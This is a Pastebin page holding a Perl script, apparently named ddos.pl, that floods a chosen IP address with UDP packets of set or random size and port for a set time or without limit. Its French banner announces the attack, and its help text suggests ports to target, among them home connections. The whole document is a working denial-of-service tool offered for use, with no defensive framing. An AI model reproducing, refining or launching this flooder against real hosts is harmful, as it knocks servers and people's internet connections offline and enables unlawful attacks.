Advertisement
Guest User

teki.pl

a guest
Mar 30th, 2015
316
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.75 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. ##
  4. # PwNy<----
  5. ##
  6.  
  7. use Socket;
  8. use strict;
  9.  
  10. if ($#ARGV != 3) {
  11. print "\n";
  12. print "[!] FLOOD BY NEOXIZ [!] \n\n";
  13. print "ddos.pl <ip> <port> <size> <time>\n\n";
  14. print " port=0: use random ports\n";
  15. print " size=1: <1> best powerful \n";
  16. print " time=0: unlimited flood\n\n";
  17. print " Exemple: perl ddos.pl 123.12.123.123 80 1 900";
  18. print "\n\n";
  19. print " ► PORT INFO ◄ \n\n";
  20. print " 21 = VPS, SERVER \n";
  21. print " 22 = SFTP \n";
  22. print " 53 = DNS ( home connection ) \n";
  23. print " 80 = Home connection, server, website, ... \n";
  24. print "\n";
  25. print " _ _ ________ \n";
  26. print "| |_ | | |___ | \n";
  27. print "| | | / / \n";
  28. print "| |\ | / /\n";
  29. print "| | \ | / /_ \n";
  30. print "|_| \_| |_______|\n";
  31. print "\n";
  32.  
  33. exit(1);
  34. }
  35. my ($ip,$port,$size,$time) = @ARGV;
  36.  
  37. my ($iaddr,$endtime,$psize,$pport);
  38.  
  39. $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
  40. $endtime = time() + ($time ? $time : 100);
  41. socket(flood, PF_INET, SOCK_DGRAM, 17);
  42.  
  43. print <<EOTEXT;
  44. _ _ ________
  45. | |_ | | |___ |
  46. | | | / /
  47. | |\ | / /
  48. | | \ | / /_
  49. |_| \_| |_______|
  50.  
  51. DDOS Launched !
  52.  
  53. EOTEXT
  54.  
  55. print "IP CIBLE: $ip " . "SUR LE PORT: " . ($port ? $port : "random") . "
  56. PUISSANCE D'ATTAQUE: " .
  57. ($size ? "$size BYTE(S)" : "PUISSANCE EXTRÊME") . "
  58. " .
  59. ($time ? " POUR $time SECONDE(S)" : "") . "\n";
  60. print "STOPPER L'ATTAQUE: CTRL + C" unless $time;
  61.  
  62. for (;time() <= $endtime;) {
  63. $psize = $size ? $size : int(rand(1500000-64)+64) ;
  64. $pport = $port ? $port : int(rand(1500000))+1;
  65.  
  66. send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
  67. $iaddr));}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement